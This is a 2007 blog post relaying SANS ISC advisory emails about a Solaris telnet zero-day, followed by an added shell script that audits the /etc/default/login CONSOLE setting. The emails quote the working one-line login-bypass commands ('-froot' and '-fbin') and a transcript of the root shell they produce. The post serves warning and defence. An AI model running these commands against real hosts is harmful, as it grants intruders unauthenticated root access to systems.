Sunday, February 11, 2007

[Dshield] Solaris Telnet 0-day (Important!)

This morning, I received an email from Dshield about a Solaris Telnet 0-day. The article about this issue:
https://isc.sans.org/diary.html?storyid=2220

You can also read these emails:

Email 1:
If you run Solaris, please check if you got telnet enabled NOW. If you
can, block port 23 at your perimeter. There is a fairly trivial Solaris
telnet 0-day.

telnet -l "-froot" [hostname]

will give you root on many Solaris systems with default installs.
We are still testing. Please use our contact form at
https://isc.sans.org/contact.html
if you have any details about the use of this exploit.

Email 2:
On systems where the above fails with "Not on system console", don't
assume that the machine is secure, because the following does work,
and is one step from root:
telnet -l "-fbin" [hostname]
The above is from my testing with Solaris 10, so get ready to start
kicking...

Email 3:
HD is not 100% accurate. It can be -froot if and only if you have
commented the CONSOLE setting within /etc/default/login . This
setting prevents network logons to root account and is set by
default. However, I have seen some admins comment it out as they had
been able to do logins to the root account in other unix or linux
distributions. Below is an excerpt for a test on a system that has
that setting commented.

% telnet -l "-froot" 192.168.1.1
Trying 192.168.1.1...
Connected to somehost (192.168.1.1.).
Escape character is '^]'.
Last login: Sun Feb 11 15:08:17 from myhost
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
# id
uid=0(root) gid=0(root)

With the console setting in its default state you get the below

% telnet -l "-froot" 192.168.1.1
Trying 192.168.1.1...
Connected to somehost (192.168.1.1.).
Escape character is '^]'.
Not on system console
Connection closed by foreign host.

Trying userids with non-standard shells such as /bin/false, or one
similar to the one in the jass package, will also kick the end
user out. Users that have been locked (passwd -l userid) will also
be booted out with a "Login incorrect" message.
Hope this helps everyone understand how much risk they have.
Scott
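
As an added defender-side example (not part of the Dshield emails or the ISC diary), here is a small POSIX shell audit of the /etc/default/login CONSOLE setting Scott describes. The function names and the sample file contents are constructed, and it assumes that an uncommented CONSOLE line with a non-empty value is the restrictive state; anything else is reported for review.

```shell
#!/bin/sh
# Added audit helper (not from the ISC diary): check whether a Solaris
# /etc/default/login file still has the CONSOLE restriction that made
# "-froot" fail with "Not on system console" in the transcript above.
# Assumption: an uncommented CONSOLE line with a non-empty value is the
# restrictive state; anything else is reported for review.

# console_restricted FILE -> exit 0 if CONSOLE is active, 1 otherwise
console_restricted() {
    # Comment lines start with '#', so they do not match; require
    # CONSOLE= followed by a non-blank value (e.g. /dev/console).
    grep -E '^[[:space:]]*CONSOLE=[^[:space:]]+' "$1" >/dev/null 2>&1
}

# audit_login_file FILE -> prints a verdict, returns console_restricted's status
audit_login_file() {
    if console_restricted "$1"; then
        echo "$1: CONSOLE set, root login limited to the console"
        return 0
    fi
    echo "$1: CONSOLE commented out or missing, review network root login"
    return 1
}

# Demo on constructed sample files standing in for /etc/default/login.
demo() {
    ok=$(mktemp) && bad=$(mktemp)
    printf '# If CONSOLE is set, root can only login on that device.\nCONSOLE=/dev/console\n' > "$ok"
    printf '# Admin commented this out to allow remote root login.\n#CONSOLE=/dev/console\n' > "$bad"
    audit_login_file "$ok"
    audit_login_file "$bad" || true
    rm -f "$ok" "$bad"
}

demo
```

On a real host, point audit_login_file at /etc/default/login; a non-zero exit is the state in which the first transcript above (root shell over telnet) was recorded.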


That's why I don't like to use Solaris......hehehehe....

1 comment:

Anonymous said...

Your blog keeps getting better and better! Your older articles are not as good as the newer ones; you have a lot more creativity and originality now. Keep it up!